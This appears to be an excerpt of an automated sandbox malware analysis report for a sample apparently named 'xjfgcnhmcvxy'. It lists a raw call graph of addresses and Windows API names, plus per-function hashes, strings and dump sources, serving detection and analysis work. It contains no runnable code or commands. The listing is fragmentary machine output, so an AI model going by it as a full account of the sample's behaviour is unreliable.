4174 7ff723475a20 InitializeCriticalSection 4172->4174 4173->4169 4174->4173 4175->4169 4176->4175 4177->4176 4177->4177 4178 7ff723475815 4179 7ff723475839 4178->4179 4180 7ff723475844 calloc 4178->4180 4180->4179 4181 7ff72347585b EnterCriticalSection LeaveCriticalSection 4180->4181 3890 7ff723471291 3891 7ff7234712e7 malloc 3890->3891 3893 7ff72347131e malloc memcpy 3891->3893 3894 7ff7234713b0 3891->3894 3893->3894 4182 7ff723478311 4184 7ff723478338 4182->4184 4185 7ff7234783c4 4182->4185 4183 7ff7234767e0 8 API calls 4188 7ff723478839 4183->4188 4186 7ff723478a47 4184->4186 4187 7ff7234789c5 4184->4187 4184->4188 4193 7ff723477650 4184->4193 4185->4187 4185->4188 4189 7ff7234767e0 8 API calls 4186->4189 4191 7ff7234767e0 8 API calls 4187->4191 4188->4183 4192 7ff723478a74 4189->4192 4191->4186 4192->4192 4195 7ff72347766f 4193->4195 4194 7ff723477776 4194->4185 4195->4194 4196 7ff723476880 4 API calls 4195->4196 4197 7ff723476900 2 API calls 4195->4197 4196->4195 4197->4195 3896 7ff723478590 3897 7ff7234785a7 3896->3897 3898 7ff723476900 2 API calls 3897->3898 3899 7ff7234785c8 3898->3899 3900 7ff723478d90 3903 7ff723478ab0 3900->3903 3904 7ff723478ac3 3903->3904 3907 7ff72347a5c0 3904->3907 3914 7ff72347a4a0 3907->3914 3909 7ff72347a5d4 malloc 3910 7ff72347a601 3909->3910 3913 7ff723478ae4 3909->3913 3912 7ff72347a643 LeaveCriticalSection 3910->3912 3910->3913 3912->3913 3915 7ff72347a4b4 3914->3915 3916 7ff72347a520 EnterCriticalSection 3914->3916 3918 7ff72347a4f1 InitializeCriticalSection InitializeCriticalSection 3915->3918 3920 7ff72347a4b8 3915->3920 3916->3920 3917 7ff72347a4db 3917->3909 3917->3910 3918->3920 3919 7ff72347a4c4 Sleep 3919->3919 3919->3920 3920->3916 3920->3917 3920->3919 3807 7ff723474290 3812 7ff723473e80 wcslen 3807->3812 3810 7ff723473cc0 4 API calls 3811 7ff7234742d3 3810->3811 3816 7ff723473eb0 3812->3816 3813 7ff723473ece memset wcscpy 3814 7ff723473cc0 4 API calls 3813->3814 3814->3816 3815 7ff723473f85 3815->3810 3816->3813 3816->3815 4201 7ff723471010 4203 7ff72347104b 4201->4203 4202 7ff72347106d __set_app_type 4204 7ff723471077 4202->4204 4203->4202 4203->4204 4205 7ff7234784fd 4206 7ff723478506 4205->4206 4209 7ff723476e60 4206->4209 4210 7ff723476ea0 strlen 4209->4210 4211 7ff723476e85 4209->4211 4210->4211 4211->4210 3921 7ff723478477 3922 7ff7234784b1 3921->3922 3923 7ff72347849e 3921->3923 3925 7ff7234774e0 17 API calls 3922->3925 3927 7ff7234774e0 3923->3927 3926 7ff7234787b8 3925->3926 3926->3926 3928 7ff7234774f9 3927->3928 3929 7ff723477604 3928->3929 3930 7ff723477534 3928->3930 3968 7ff7234767e0 3929->3968 3931 7ff7234775a0 3930->3931 3933 7ff723477548 3930->3933 3935 7ff7234775a4 strlen 3931->3935 3936 7ff7234775af 3931->3936 3937 7ff723477624 strlen 3933->3937 3938 7ff723477550 3933->3938 3935->3936 3964 7ff723477360 3936->3964 3937->3938 3949 7ff723476a80 3938->3949 3939 7ff723478b40 5 API calls 3941 7ff72347761b 3939->3941 3941->3922 3945 7ff723477567 3958 7ff723478b40 3945->3958 3950 7ff723476aa2 3949->3950 3951 7ff723476c32 3950->3951 3953 7ff723476d30 3950->3953 3954 7ff723476b1b 3950->3954 3956 7ff723476c51 3951->3956 3972 7ff723476880 3951->3972 3955 7ff723476880 4 API calls 3953->3955 3953->3956 3954->3951 3957 7ff723476900 2 API calls 3954->3957 3955->3956 3956->3945 3957->3954 3960 7ff72347a6c0 3958->3960 3959 7ff723477592 3959->3922 3960->3959 3961 7ff72347a4a0 4 API calls 3960->3961 3962 7ff72347a6e7 3961->3962 3962->3959 3963 7ff72347a710 LeaveCriticalSection 3962->3963 3965 7ff723477396 3964->3965 3966 7ff723476a80 6 API calls 3965->3966 3967 7ff723477401 3966->3967 3969 7ff7234767f4 3968->3969 3969->3969 3992 7ff723476650 3969->3992 3971 7ff72347682e 3971->3939 3973 7ff7234768b0 3972->3973 3975 7ff72347688f 3972->3975 3976 7ff72347b270 3973->3976 3975->3956 3977 7ff72347b29e 3976->3977 3980 7ff72347b100 3977->3980 3979 7ff72347b2cb 3979->3975 3981 7ff72347b233 3980->3981 3984 7ff72347b115 3980->3984 3981->3979 3982 7ff72347b1d1 3982->3979 3983 7ff72347b1b4 3986 7ff72347b200 MultiByteToWideChar 3983->3986 3987 7ff72347b1bf 3983->3987 3984->3982 3984->3983 3985 7ff72347b149 IsDBCSLeadByteEx 3984->3985 3988 7ff72347b164 3984->3988 3985->3983 3985->3988 3986->3982 3990 7ff72347b243 _errno 3986->3990 3987->3979 3988->3982 3989 7ff72347b18e MultiByteToWideChar 3988->3989 3989->3990 3991 7ff72347b1a8 3989->3991 3990->3982 3991->3979 3993 7ff72347666c 3992->3993 3994 7ff723476775 3992->3994 3993->3994 4000 7ff72347668f 3993->4000 3995 7ff7234767ba fwprintf 3994->3995 3996 7ff723476788 3994->3996 3999 7ff7234767a1 3995->3999 3997 7ff7234767ce fwprintf 3996->3997 3998 7ff723476795 fwprintf 3996->3998 3997->3999 3998->3999 3999->3971 4001 7ff7234766cb strlen 4000->4001 4002 7ff7234766a9 4000->4002 4003 7ff72347b270 4 API calls 4001->4003 4002->3971 4003->4000 4004 7ff723475a80 4005 7ff723475a8d 4004->4005 4006 7ff723475ad0 4004->4006 4007 7ff723475a91 4005->4007 4008 7ff723475af0 4005->4008 4009 7ff723475b70 InitializeCriticalSection TlsAlloc 4006->4009 4017 7ff723475ade 4006->4017 4010 7ff723475a96 TlsGetValue 4007->4010 4011 7ff723475ac3 4007->4011 4012 7ff723475afc 4008->4012 4013 7ff723475b20 TlsGetValue 4008->4013 4009->4017 4014 7ff723475a40 free 4010->4014 4012->4011 4015 7ff723475b05 DeleteCriticalSection 4012->4015 4016 7ff723475a40 free 4013->4016 4018 7ff723475ab1 TlsSetValue 4014->4018 4015->4011 4019 7ff723475b3b TlsSetValue 4016->4019 4018->4011 4020 7ff723475a40 free 4019->4020 4021 7ff723475b58 TlsFree 4020->4021 4021->4012 4212 7ff723475e00 4214 7ff723475e0f 4212->4214 4213 7ff723475e7e 4214->4213 4215 7ff723475e69 strncmp 4214->4215 4215->4213 4215->4214 3702 7ff7234763ac 3703 7ff7234763bc 3702->3703 3704 7ff7234764e8 3702->3704 3705 7ff72347651c WaitForSingleObject 3703->3705 3706 7ff7234763ca 3703->3706 3714 7ff7234764ba 3703->3714 3707 7ff7234764a1 3704->3707 3708 7ff7234764f2 3704->3708 3705->3706 3710 7ff7234764c7 3706->3710 3713 7ff723476331 GetLastError TlsGetValue SetLastError 3706->3713 3716 7ff7234763ef ReleaseSemaphore 3706->3716 3728 7ff723476290 CreateSemaphoreW TlsAlloc 3707->3728 3708->3703 3709 7ff72347650c 3708->3709 3712 7ff723476510 Sleep 3709->3712 3712->3712 3715 7ff72347651a 3712->3715 3717 7ff72347635f 3713->3717 3714->3710 3714->3713 3715->3703 3716->3713 3718 7ff723476317 3717->3718 3720 7ff7234761f0 3717->3720 3721 7ff723476207 malloc 3720->3721 3722 7ff723476240 malloc 3720->3722 3723 7ff723476215 3721->3723 3724 7ff723476282 abort 3721->3724 3722->3724 3725 7ff72347624f 3722->3725 3726 7ff72347626a memset 3723->3726 3727 7ff723476228 memcpy 3723->3727 3725->3726 3725->3727 3726->3718 3727->3718 3729 7ff7234762c3 3728->3729 3730 7ff7234762e0 GetLastError 3728->3730 3731 7ff7234762db 3729->3731 3732 7ff7234762e8 abort 3729->3732 3730->3729 3731->3703 4216 7ff7234781aa 4217 7ff723478603 4216->4217 4219 7ff7234781b8 4216->4219 4218 7ff723476900 2 API calls 4217->4218 4217->4219 4220 7ff723478623 4218->4220 4221 7ff7234786a9 4222 7ff7234786ae localeconv 4221->4222 4223 7ff7234786a0 4221->4223 4224 7ff72347b270 4 API calls 4222->4224 4225 7ff7234786e8 4224->4225 4226 7ff7234750b1 4227 7ff7234750ba 4226->4227 4228 7ff7234751c5 4226->4228 4229 7ff723475140 VirtualProtect 4227->4229 4231 7ff7234750ce 4227->4231 4230 7ff72347517c GetLastError 4229->4230 4229->4231 4232 7ff723475190 4230->4232 3740 7ff72347b0b0 3741 7ff72347b0c9 3740->3741 3742 7ff72347b0c0 3740->3742 3744 7ff723475bc0 3742->3744 3745 7ff723475bc8 3744->3745 3746 7ff723475bd0 TlsGetValue 3744->3746 3745->3741 3751 7ff723475a40 3746->3751 3749 7ff723475a40 free 3750 7ff723475c14 3749->3750 3750->3741 3752 7ff723475a6c TlsSetValue TlsFree 3751->3752 3753 7ff723475a52 free 3751->3753 3752->3749 3753->3752 4233 7ff723474db0 4234 7ff723474db9 4233->4234 4235 7ff723474dbd 4234->4235 4236 7ff723475940 3 API calls 4234->4236 4237 7ff723474dd5 4236->4237 3733 7ff72347139c 3734 7ff7234712f3 malloc 3733->3734 3735 7ff7234713b5 3734->3735 3738 7ff72347131e 3734->3738 3736 7ff72347134d 3737 7ff723471351 malloc memcpy 3736->3737 3736->3738 3737->3736 3739 7ff7234713b0 3737->3739 3738->3736 3738->3738 3739->3735 4238 7ff723471298 4239 7ff72347129d 4238->4239 4240 7ff7234712c0 malloc 4238->4240 4243 7ff72347131e 4240->4243 4244 7ff7234713b0 4240->4244 4242 7ff723471351 malloc memcpy 4242->4243 4242->4244 4243->4242 4243->4243 4245 7ff723475298 4246 7ff723475222 4245->4246 4247 7ff7234752a0 4245->4247 4247->4246 4248 7ff7234753b2 VirtualProtect 4247->4248 4248->4247 4252 7ff72347aea0 4253 7ff72347a5c0 6 API calls 4252->4253 4254 7ff72347aebc 4253->4254 4025 7ff723475c20 4026 7ff723475c37 4025->4026 4027 7ff723475cb5 4025->4027 4028 7ff723475c61 calloc 4026->4028 4028->4027 4029 7ff723475c78 EnterCriticalSection LeaveCriticalSection 4028->4029 4255 7ff7234758a0 4256 7ff7234758b1 4255->4256 4257 7ff7234758c0 EnterCriticalSection 4255->4257 4258 7ff7234758d9 4257->4258 4259 7ff7234758f3 LeaveCriticalSection 4257->4259 4258->4259 4260 7ff7234758df free LeaveCriticalSection 4258->4260 4261 7ff723475900 4259->4261 4260->4261 4263 7ff7234783c9 4264 7ff7234783f0 4263->4264 4265 7ff723478403 4263->4265 4269 7ff723477440 4264->4269 4267 7ff723477440 15 API calls 4265->4267 4268 7ff723478799 4267->4268 4268->4268 4270 7ff723477454 4269->4270 4271 7ff72347748b 4270->4271 4272 7ff7234774c0 4270->4272 4273 7ff723477360 6 API calls 4271->4273 4274 7ff7234767e0 8 API calls 4272->4274 4275 7ff72347749a 4273->4275 4276 7ff7234774cf 4274->4276 4277 7ff723478b40 5 API calls 4275->4277 4278 7ff723478b40 5 API calls 4276->4278 4280 7ff7234774a2 4277->4280 4279 7ff7234774d7 4278->4279 4279->4265 4280->4265 4281 7ff7234755c8 4282 7ff7234755f1 4281->4282 4283 7ff723475653 4282->4283 4284 7ff723475672 signal 4282->4284 4285 7ff7234755ff 4282->4285 4291 7ff723475645 4282->4291 4286 7ff723475660 4283->4286 4287 7ff72347563c 4283->4287 4289 7ff7234756b0 4283->4289 4284->4287 4288 7ff723475688 signal 4284->4288 4285->4289 4290 7ff723475610 4285->4290 4285->4291 4286->4284 4286->4287 4286->4291 4287->4291 4292 7ff723475760 signal 4287->4292 4288->4291 4289->4287 4289->4291 4293 7ff7234756be signal 4289->4293 4290->4287 4290->4291 4294 7ff723475626 signal 4290->4294 4292->4291 4293->4287 4295 7ff723475779 signal 4293->4295 4294->4287 4296 7ff723475790 signal 4294->4296 4295->4291 4296->4291 4033 7ff723478154 4034 7ff72347817b 4033->4034 4035 7ff723478760 4033->4035 4044 7ff723476fb0 4034->4044 4037 7ff723476fb0 15 API calls 4035->4037 4038 7ff72347877a 4037->4038 4038->4038 4039 7ff7234780e4 4040 7ff7234785a7 4039->4040 4041 7ff723476650 8 API calls 4039->4041 4042 7ff723476900 2 API calls 4040->4042 4041->4039 4043 7ff7234785c8 4042->4043 4045 7ff723476fc4 4044->4045 4046 7ff723477004 4045->4046 4047 7ff723477040 4045->4047 4049 7ff723476a80 6 API calls 4046->4049 4048 7ff7234767e0 8 API calls 4047->4048 4050 7ff72347704f 4048->4050 4051 7ff723477013 4049->4051 4052 7ff723478b40 5 API calls 4050->4052 4054 7ff723478b40 5 API calls 4051->4054 4053 7ff723477057 4052->4053 4053->4039 4055 7ff723477037 4054->4055 4055->4039 3817 7ff723473650 memset 3818 7ff7234736a2 3817->3818 3819 7ff723473e80 7 API calls 3818->3819 3820 7ff723473719 memcpy 3819->3820 3821 7ff72347373f 3820->3821 3822 7ff7234737f5 memcpy 3821->3822 3823 7ff723473752 3821->3823 3822->3823 3841 7ff723473590 3823->3841 3825 7ff7234737b2 3848 7ff7234740e0 3825->3848 3827 7ff7234737bf 3851 7ff7234743a0 3827->3851 3829 7ff7234737db 3830 7ff7234737ca 3830->3829 3831 7ff7234738bf wcsstr 3830->3831 3832 7ff7234738cf 3831->3832 3833 7ff7234738e4 3831->3833 3834 7ff723473977 wcsstr 3833->3834 3834->3832 3835 7ff72347398b 3834->3835 3836 7ff7234739f4 wcsstr 3835->3836 3836->3832 3837 7ff723473a08 3836->3837 3838 7ff723473a71 wcsstr 3837->3838 3838->3832 3840 7ff723473a85 3838->3840 3839 7ff723473b3e wcsstr 3839->3829 3840->3839 3840->3840 3854 7ff723476160 3841->3854 3845 7ff7234735e0 3846 7ff723472d40 12 API calls 3845->3846 3847 7ff723473603 3846->3847 3847->3825 3849 7ff723473cc0 4 API calls 3848->3849 3850 7ff72347411c 3849->3850 3850->3827 3852 7ff723473cc0 4 API calls 3851->3852 3853 7ff7234743c9 3852->3853 3853->3830 3855 7ff7234735a0 memset 3854->3855 3856 7ff723476580 3855->3856 3857 7ff72347658e 3856->3857 3858 7ff7234765d0 3856->3858 3863 7ff723477f30 3857->3863 3860 7ff723477f30 2 API calls 3858->3860 3862 7ff7234765e5 3860->3862 3861 7ff7234765a7 3861->3845 3862->3845 3865 7ff723477f62 3863->3865 3864 7ff723477fee 3866 7ff72347800f 3864->3866 3872 7ff723476900 3864->3872 3865->3864 3868 7ff723476900 2 API calls 3865->3868 3869 7ff72347809d 3865->3869 3866->3861 3868->3865 3870 7ff723476900 2 API calls 3869->3870 3871 7ff723478623 3869->3871 3870->3871 3871->3861 3873 7ff72347691a 3872->3873 3874 7ff723476a2a fwprintf 3873->3874 3875 7ff723476a61 fwprintf 3873->3875 3876 7ff72347693d 3873->3876 3874->3876 3875->3876 3876->3866 4297 7ff723475cd0 4298 7ff723475ce7 calloc 4297->4298 4299 7ff723475d60 4297->4299 4298->4299 4301 7ff723475d28 TlsGetValue TlsSetValue 4298->4301 4302 7ff7234780b7 4303 7ff7234781f4 4302->4303 4304 7ff7234780d4 4302->4304 4306 7ff72347821c 4303->4306 4307 7ff7234788ef wcslen 4303->4307 4305 7ff723476e60 strlen 4304->4305 4310 7ff7234780dc 4305->4310 4308 7ff723476900 2 API calls 4306->4308 4309 7ff723478234 4308->4309 4311 7ff7234785a7 4310->4311 4312 7ff723476650 8 API calls 4310->4312 4313 7ff723476900 2 API calls 4311->4313 4312->4310 4314 7ff7234785c8 4313->4314 4059 7ff723478d40 4064 7ff72347a6c0 4059->4064 4062 7ff723478ab0 6 API calls 4063 7ff723478d70 4062->4063 4065 7ff72347a6cd 4064->4065 4066 7ff723478d48 4064->4066 4067 7ff72347a4a0 4 API calls 4065->4067 4066->4062 4068 7ff72347a6e7 4067->4068 4068->4066 4069 7ff72347a710 LeaveCriticalSection 4068->4069 4315 7ff723478dc0 4316 7ff723478ab0 6 API calls 4315->4316 4317 7ff723478d71 4316->4317

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1707594695.00007FF723471000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF723470000, based on PE: true
                                                                                                              • Associated: 00000010.00000002.1707564723.00007FF723470000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707623365.00007FF72347C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707871202.00007FF723678000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707897386.00007FF72367C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707923170.00007FF72367F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707952036.00007FF723680000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7ff723470000_xjfgcnhmcvxy.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: wcslen$memset$wcscpy$wcsncmp
                                                                                                              • String ID: 0$X$`
                                                                                                              • API String ID: 4021896446-2527496196
                                                                                                              • Opcode ID: 3744c05ed35942879ce9d8b1a3091a13a1ef19d16b92aaecd0754042fa3becba
                                                                                                              • Instruction ID: 91adf6126a43f6c08a108ec42a18cdfc1133beb65251290c07eda2ab0245e440
                                                                                                              • Opcode Fuzzy Hash: 3744c05ed35942879ce9d8b1a3091a13a1ef19d16b92aaecd0754042fa3becba
                                                                                                              • Instruction Fuzzy Hash: C312A422618BC185E3A09F25E8003FAB3A5FB85799F844365DE98677D9EF3CD144CB50

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 68 7ff723473650-7ff7234736b9 memset call 7ff7234762f0 * 2 73 7ff7234736bb-7ff7234736e0 call 7ff723475a30 68->73 74 7ff7234736e5-7ff7234736e9 68->74 73->74 75 7ff7234736eb-7ff7234736fc 74->75 76 7ff723473703-7ff72347374c call 7ff723473c30 call 7ff723473e80 memcpy call 7ff7234762f0 74->76 75->76 84 7ff723473752-7ff723473757 call 7ff7234762f0 76->84 85 7ff7234737f0-7ff723473827 call 7ff7234762f0 memcpy call 7ff723475a30 76->85 90 7ff72347375a-7ff723473761 84->90 85->90 92 7ff723473795-7ff7234737c5 call 7ff723473590 call 7ff7234740e0 call 7ff7234743a0 90->92 93 7ff723473763-7ff72347376f 90->93 102 7ff7234737ca-7ff7234737cf 92->102 96 7ff723473770-7ff72347378c 93->96 96->96 98 7ff72347378e 96->98 98->92 103 7ff7234737db-7ff7234737ea 102->103 104 7ff7234737d1-7ff7234737d9 102->104 104->103 105 7ff72347382c-7ff72347386e call 7ff7234762f0 * 2 104->105 110 7ff72347389b-7ff72347389f 105->110 111 7ff723473870-7ff723473896 call 7ff723475a30 105->111 113 7ff7234738a1-7ff7234738b9 110->113 114 7ff7234738bf-7ff7234738cd wcsstr 110->114 111->110 113->114 115 7ff7234738e4-7ff723473926 call 7ff7234762f0 * 2 114->115 116 7ff7234738cf-7ff7234738e3 114->116 121 7ff723473928-7ff72347394e call 7ff723475a30 115->121 122 7ff723473953-7ff723473957 115->122 121->122 123 7ff723473959-7ff723473971 122->123 124 7ff723473977-7ff723473985 wcsstr 122->124 123->124 124->116 126 7ff72347398b-7ff7234739ad call 7ff7234762f0 * 2 124->126 131 7ff7234739d6-7ff7234739da 126->131 132 7ff7234739af-7ff7234739d1 call 7ff723475a30 126->132 134 7ff7234739dc-7ff7234739f0 131->134 135 7ff7234739f4-7ff723473a02 wcsstr 131->135 132->131 134->135 135->116 136 7ff723473a08-7ff723473a2a call 7ff7234762f0 * 2 135->136 141 7ff723473a2c-7ff723473a4e call 7ff723475a30 136->141 142 7ff723473a53-7ff723473a57 136->142 141->142 144 7ff723473a59-7ff723473a6d 142->144 145 7ff723473a71-7ff723473a7f wcsstr 142->145 144->145 145->116 146 7ff723473a85-7ff723473ae2 call 7ff7234762f0 * 2 145->146 151 7ff723473b09-7ff723473b0d 146->151 152 7ff723473ae4-7ff723473b04 call 7ff723475a30 146->152 154 7ff723473b3e-7ff723473b4f wcsstr 151->154 155 7ff723473b0f-7ff723473b19 151->155 152->151 154->103 156 7ff723473b1b-7ff723473b38 155->156 156->156 157 7ff723473b3a 156->157 157->154
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1707594695.00007FF723471000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF723470000, based on PE: true
                                                                                                              • Associated: 00000010.00000002.1707564723.00007FF723470000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707623365.00007FF72347C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707871202.00007FF723678000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707897386.00007FF72367C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707923170.00007FF72367F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707952036.00007FF723680000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7ff723470000_xjfgcnhmcvxy.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: memcpymemset
                                                                                                              • String ID:
                                                                                                              • API String ID: 1297977491-0
                                                                                                              • Opcode ID: fa988ff7348f1597ac17c7f2d0ab5e1806a45cb6d39aadf732a62bad80fa0c47
                                                                                                              • Instruction ID: 337b82d69a0ea8ca01d95ca90ce39c61d07eef86367a9f4c9257034da0aa9b20
                                                                                                              • Opcode Fuzzy Hash: fa988ff7348f1597ac17c7f2d0ab5e1806a45cb6d39aadf732a62bad80fa0c47
                                                                                                              • Instruction Fuzzy Hash: F2D1C121A0968285FB90FB25DC153B9A7A5FB55789FC480F5DA4CA7792EF3CE040CB20

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1707594695.00007FF723471000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF723470000, based on PE: true
                                                                                                              • Associated: 00000010.00000002.1707564723.00007FF723470000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707623365.00007FF72347C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707871202.00007FF723678000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707897386.00007FF72367C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707923170.00007FF72367F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707952036.00007FF723680000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7ff723470000_xjfgcnhmcvxy.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Value$_assertcalloc
                                                                                                              • String ID: !dso || dso == &__dso_handle$../../src/mingw-w64/mingw-w64-crt/crt/tls_atexit.c
                                                                                                              • API String ID: 3698345500-799109717
                                                                                                              • Opcode ID: d5ae4f6e9146a6bfd6679ddb29686c0186b300b55e1eab57a404858ba7f1170d
                                                                                                              • Instruction ID: 15a98afe6def5b3c67fd4306bde1b46047531046370cdd2ec459934b05a37ea0
                                                                                                              • Opcode Fuzzy Hash: d5ae4f6e9146a6bfd6679ddb29686c0186b300b55e1eab57a404858ba7f1170d
                                                                                                              • Instruction Fuzzy Hash: 31F0F931A0A70686FB90BB50EC541B9A29AFF48742FC480F4C91D673A1EE3CA951CB21

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1707594695.00007FF723471000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF723470000, based on PE: true
                                                                                                              • Associated: 00000010.00000002.1707564723.00007FF723470000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707623365.00007FF72347C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707871202.00007FF723678000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707897386.00007FF72367C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707923170.00007FF72367F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707952036.00007FF723680000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7ff723470000_xjfgcnhmcvxy.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$ObjectReleaseSemaphoreSingleSleepValueWait
                                                                                                              • String ID:
                                                                                                              • API String ID: 4052324419-0
                                                                                                              • Opcode ID: 6104208078307cddd0997dc0b49f7738dabc4953f05204f4a792b5b9201ebec1
                                                                                                              • Instruction ID: 54609137b6cf6cc8dad07a4680381fe29561984ceb1ff62919dbee814b8120bf
                                                                                                              • Opcode Fuzzy Hash: 6104208078307cddd0997dc0b49f7738dabc4953f05204f4a792b5b9201ebec1
                                                                                                              • Instruction Fuzzy Hash: 48313F31A0A65386F6D5BB25AC04639A357FF40B57BD840F9C91DA3690CE2DE445CF24

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1707594695.00007FF723471000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF723470000, based on PE: true
                                                                                                              • Associated: 00000010.00000002.1707564723.00007FF723470000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707623365.00007FF72347C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707871202.00007FF723678000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707897386.00007FF72367C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707923170.00007FF72367F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707952036.00007FF723680000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7ff723470000_xjfgcnhmcvxy.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: malloc$abortmemcpymemset
                                                                                                              • String ID:
                                                                                                              • API String ID: 4174897659-0
                                                                                                              • Opcode ID: 11aa2f77687e6010a0220c0cc8b297790f50f1030fb276212690dc919bd9b299
                                                                                                              • Instruction ID: bc9eedce152142394a66883a4f4c81ffe8c2ad3d7c28e5dc92de80314f9a6845
                                                                                                              • Opcode Fuzzy Hash: 11aa2f77687e6010a0220c0cc8b297790f50f1030fb276212690dc919bd9b299
                                                                                                              • Instruction Fuzzy Hash: 7D014862F0664540E9C8BB56ED005F89251EF44FD9FC885B0CE0C67385EE3CE981C760

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1707594695.00007FF723471000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF723470000, based on PE: true
                                                                                                              • Associated: 00000010.00000002.1707564723.00007FF723470000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707623365.00007FF72347C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707871202.00007FF723678000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707897386.00007FF72367C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707923170.00007FF72367F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.1707952036.00007FF723680000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7ff723470000_xjfgcnhmcvxy.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: memset$_wgetenv
                                                                                                              • String ID: 99C
                                                                                                              • API String ID: 1931056239-3786687225
                                                                                                              • Opcode ID: d1bab92ebf63fddee53c089ac34567189e0f2d4c6f75371f493852c7c16a1818
                                                                                                              • Instruction ID: 8a594ecc3ca321a2969728ce77144b62d093bf9a880a9f4ad9cb124ca0e0667e
                                                                                                              • Opcode Fuzzy Hash: d1bab92ebf63fddee53c089ac34567189e0f2d4c6f75371f493852c7c16a1818
                                                                                                              • Instruction Fuzzy Hash: 86410422A0978185F7A0EF25E8443BAB794FB45B84F8480F5EE8D97799EE3CD041CB10

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1707594695.00007FF723471000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF723470000, based on PE: true
                                                                                                              • Associated: 00000010.00000002.1707564723.00007FF723470000.00000002.00000001.01000000.00000009.sdmpDownload File
